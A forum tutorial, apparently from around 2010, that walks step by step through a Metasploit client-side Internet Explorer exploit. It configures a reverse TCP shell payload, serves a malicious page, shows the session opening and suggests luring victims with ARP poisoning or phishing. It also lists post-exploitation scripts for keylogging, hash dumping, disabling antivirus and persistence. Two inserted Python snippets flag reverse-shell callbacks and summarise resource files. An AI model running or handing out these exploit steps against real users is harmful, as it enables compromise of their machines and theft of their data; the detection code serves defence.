For beginners, much of this material can also be found in some good resources I will cite later. Please leave comments on things you'd like to see included or corrections that need to be made. Currently this post is a work in progress.
This demonstration uses the new "windows/browser/ms10_xxx_ie_css_clip" exploit module.
More info is available from Exploit-db: New IE6,7,8 mem corruption
Common msfconsole tasks:
First, of course, open a terminal and issue the command:
Code:
root@bt:~# msfconsole
Then there are some basics: searching for exploits, getting a more detailed description of a given exploit from within the framework, selecting a payload, running the exploit, some of the simple automation that can be done, and other oddities. Here we will look for exploits that correspond to 2010 Microsoft security advisories.
Next, maybe we want to know more about a given exploit. This information looks similar to what is found in the advisories, and maybe even on the Exploits Database by Offensive Security, but it also includes things like the options that can be set.
Code:
info windows/browser/ms10_xxx_ie_css_clip
Now we will load up the exploit we'd like to try.
Code:
use windows/browser/ms10_xxx_ie_css_clip
We need to configure our exploit options for it to work, of course. I like to select payloads first. Not all payloads work with all exploits. To keep things simple, the Metasploit developers have designed the framework so that once you have selected the exploit you would like to use, issuing the command below (show payloads) will only show the payloads that work with your selected exploit.
Code:
msf exploit(ms10_xxx_ie_css_clip) > show payloads
Remember the info command we used with exploits? Well, it works with payloads too. Take some time to familiarize yourself with the payloads Metasploit has to offer.
Code:
msf exploit(ms10_xxx_ie_css_clip) > info windows/shell/reverse_tcp
Let's go ahead and select a payload to use.
Code:
msf exploit(ms10_xxx_ie_css_clip) > set payload windows/shell/reverse_tcp
Now we need to configure our options. Let's take a look at what options we have.
Code:
msf exploit(ms10_xxx_ie_css_clip) > show options
OK, let's set things up!
Code:
msf exploit(ms10_xxx_ie_css_clip) > set lhost 192.168.1.105
msf exploit(ms10_xxx_ie_css_clip) > set lport 31337
msf exploit(ms10_xxx_ie_css_clip) > set uripath /
msf exploit(ms10_xxx_ie_css_clip) > set srvport 80
The uripath option sets the path at which the malicious web server will be served; the root directory keeps it simple. srvport sets the web server port to 80, which also makes this vector simpler to perform. Please refer to other documentation for the other options, such as the excellent
Metasploit Unleashed Information Security Training
Here is where you might want to include some automation or set some of the other features. To view the advanced options available, issue the following command:
A couple of interesting advanced options are AutoRunScript and InitialAutoRunScript.
Please refer to section 10 (Meterpreter scripting) of the MSF Unleashed course for more information on which scripts are available.
Another way is to issue the following command in your terminal (not in the framework console):
Code:
root@bt:~# ls /pentest/exploits/framework3/scripts/meterpreter/
arp_scanner.rb enum_putty.rb getcountermeasure.rb multi_meter_inject.rb remotewinenum.rb webcam.rb
autoroute.rb enum_shares.rb getgui.rb multicommand.rb scheduleme.rb win32-sshclient.rb
checkvm.rb enum_vmware.rb gettelnet.rb multiscript.rb schtasksabuse.rb win32-sshserver.rb
credcollect.rb event_manager.rb getvncpw.rb netenum.rb scraper.rb winbf.rb
domain_list_gen.rb file_collector.rb hashdump.rb packetrecorder.rb screen_unlock.rb winenum.rb
dumplinks.rb get_application_list.rb hostsedit.rb panda_2007_pavsrv51.rb search_dwld.rb wmic.rb
duplicate.rb get_env.rb keylogrecorder.rb persistence.rb service_permissions_escalate.rb
enum_chrome.rb get_filezilla_creds.rb killav.rb pml_driver_config.rb srt_webdrive_priv.rb
enum_firefox.rb get_local_subnets.rb metsvc.rb powerdump.rb uploadexec.rb
enum_logged_on_users.rb get_loggedon_users.rb migrate.rb prefetchtool.rb virtualbox_sysenter_dos.rb
enum_powershell_env.rb get_pidgin_creds.rb multi_console_command.rb process_memdump.rb vnc.rb
The two AutoRunScript options allow your session to perform scripted tasks as soon as the session begins. Things like making a Meterpreter session persistent, beginning a keylogger immediately, migrating your session to another process, or even chaining multiple commands are possible. You'll want to do some studying and experimenting to find what automation works for you.
Now we need to run our exploit. I like the -j option, as it backgrounds the exploit process so you can continue to work in the framework console.
Now find a creative way to lure your victim to your malicious website, since the exploit we've selected here is client side. You could use ARP poisoning or a phishing-style attack with the link. Be inventive! I am just using a simple, not updated Windows XP SP3 machine running on my LAN in VirtualBox, so I will just browse there myself. In my victim's web browser I simply entered my attacker's IP:
Code:
http://192.168.1.105/
Well, we got a session! Here is some output from my msfconsole:
Code:
msf exploit(ms10_xxx_ie_css_clip) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.105:31337
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.105:80/
[*] Server started.
msf exploit(ms10_xxx_ie_css_clip) >[*] Sending Internet Explorer CSS SetUserClip Memory Corruption to 192.168.1.147:1053 (target: Internet Explorer 6)...
[*] Sending stage (240 bytes) to 192.168.1.147
[*] Command shell session 1 opened (192.168.1.105:31337 -> 192.168.1.147:1055) at 2010-11-14 11:34:44 -0600
[*] Session ID 1 (192.168.1.105:31337 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
[-] Error: Command shell sessions do not support migration
In this case we are using a simple reverse shell and not a Meterpreter. The migration error is OK, as migrate is a Meterpreter script. In some instances you may only be able to begin with a shell because of the payload limitations an exploit has. No problem. Here is what I like to do:
Turning Windows shells into Meterpreter sessions the easy way.
First, let's list our sessions. Then we'll take a look at the options the sessions command has, since there is one we like a lot.
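The console output above shows the two network events a defender can correlate: the victim fetching the page on srvport 80, then the reverse_tcp payload calling back to the listener on 31337. As an added example (not from the original post), this script flags that pattern in a constructed connection log; the log format, the WEB_PORTS set and the 60-second window are assumptions.

```python
"""Flag a reverse-shell callback that follows a client-side browser exploit.

Added example, not from the original post. It correlates two events in a
connection log: a client fetching a page from a host's web port and, soon
after, the same client connecting back to that host on a high non-standard
port. That is the shape of the session in the console output above (page on
srvport 80, then the reverse_tcp callback to 31337). Log format is assumed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "<date> <time> <src>:<sport> -> <dst>:<dport>".
# The .147 lines mirror the console output; .150 is a control case whose
# second connection falls outside the correlation window.
SAMPLE_LOG = """\
2010-11-14 11:34:40 192.168.1.147:1053 -> 192.168.1.105:80
2010-11-14 11:34:41 192.168.1.147:1054 -> 192.168.1.105:80
2010-11-14 11:34:44 192.168.1.147:1055 -> 192.168.1.105:31337
2010-11-14 11:40:02 192.168.1.150:2001 -> 192.168.1.105:80
2010-11-14 11:52:10 192.168.1.150:2002 -> 192.168.1.105:31337
"""

WEB_PORTS = {80, 443, 8080}      # where the "malicious website" is served
WINDOW = timedelta(seconds=60)   # how soon the callback must follow

def parse_line(line):
    """Return (timestamp, client_ip, server_ip, server_port)."""
    date, time, src, _, dst = line.split()
    ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    server_ip, server_port = dst.rsplit(":", 1)
    return ts, src.rsplit(":", 1)[0], server_ip, int(server_port)

def find_callbacks(log_text, window=WINDOW):
    """Return (client, server, callback_port, delay_seconds) for every
    non-web connection that follows a web hit to the same server."""
    web_hits = defaultdict(list)  # (client, server) -> web hit times
    findings = []
    for line in filter(str.strip, log_text.splitlines()):
        ts, client, server, port = parse_line(line)
        if port in WEB_PORTS:
            web_hits[(client, server)].append(ts)
            continue
        # Heuristic: an earlier web hit inside the window flags this flow.
        for t0 in web_hits[(client, server)]:
            if timedelta(0) <= ts - t0 <= window:
                delay = int((ts - t0).total_seconds())
                findings.append((client, server, port, delay))
                break
    return findings
```

The rule is a heuristic: a host that legitimately serves several ports will also match, so it is a triage signal to pair with the exploit's web requests rather than a verdict on its own.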
Code:
msf exploit(ms10_xxx_ie_css_clip) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.105:31337 -> 192.168.1.147:1055
msf exploit(ms10_xxx_ie_css_clip) > sessions -h
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-d <opt> Detach an interactive session
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate session
-l List all active sessions
-q Quiet mode
-s <opt> Run a script on the session given with -i, or all
-u <opt> Upgrade a win32 shell to a meterpreter session
-v List verbose fields
That -u option is pretty sweet. Let's go ahead and upgrade our shell to a Meterpreter. FYI, it did not work in this instance, possibly because the shell we are using is also a reverse connection. I will edit this thread later with the correct updates. Anyway, the command to upgrade a shell is:
Code:
msf exploit(ms10_xxx_ie_css_clip) > sessions -u 1
EDIT: I didn't get the thread edited with the upgrade working, but I have made a video of using the spoolss exploit with a reverse shell payload and then upgrading that. I've also shown the makerc command and the migrate Meterpreter script. Migrate should be covered elsewhere and is a mostly simple concept. To understand when migrate is not simple, watch the megaprimer series.
Makerc is useful as it will generate a Metasploit resource file (almost akin to a bash script for Metasploit) of all the commands used in that session. It's a good automation tool. I will show using resource files later on, and they are also covered in the MSF Unleashed course.
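Because a resource file is just one console command per line, it can also be read back, for instance to work out what a recovered .rc file configures without replaying it. As an added example (not from the original post), this summariser handles the commands used in this thread; the sample file is constructed from them, and the <ruby> block handling assumes the embedded-Ruby syntax resource files support.

```python
"""Summarise a Metasploit resource (.rc) file such as makerc produces.

Added example, not from the original post. A resource file is one console
command per line, optionally with embedded <ruby> ... </ruby> blocks, so a
recovered .rc can be read back into "which module, which payload, which
listener" without replaying it. The sample is constructed from this post.
"""

SAMPLE_RC = """\
# constructed makerc-style output
use windows/browser/ms10_xxx_ie_css_clip
set payload windows/shell/reverse_tcp
set LHOST 192.168.1.105
set lport 31337
set uripath /
set srvport 80
set InitialAutoRunScript migrate -f
exploit -j
sessions -u 1
"""

def summarize_rc(text):
    """Return a dict of modules, payload, options, actions and ruby blocks."""
    summary = {"modules": [], "payload": None, "options": {},
               "actions": [], "ruby_blocks": 0}
    in_ruby = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower() in ("<ruby>", "</ruby>"):  # embedded Ruby: count only
            in_ruby = line.lower() == "<ruby>"
            summary["ruby_blocks"] += int(in_ruby)
            continue
        if in_ruby:
            continue
        parts = line.split()
        cmd = parts[0].lower()
        if cmd == "use" and len(parts) > 1:
            summary["modules"].append(parts[1])
        elif cmd in ("set", "setg") and len(parts) > 2:
            name, value = parts[1].lower(), " ".join(parts[2:])
            if name == "payload":              # option names are case-insensitive
                summary["payload"] = value
            else:
                summary["options"][name] = value
        elif cmd in ("exploit", "run", "sessions"):
            summary["actions"].append(line)
    return summary
```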
m10_061_spoolss demo
...continued....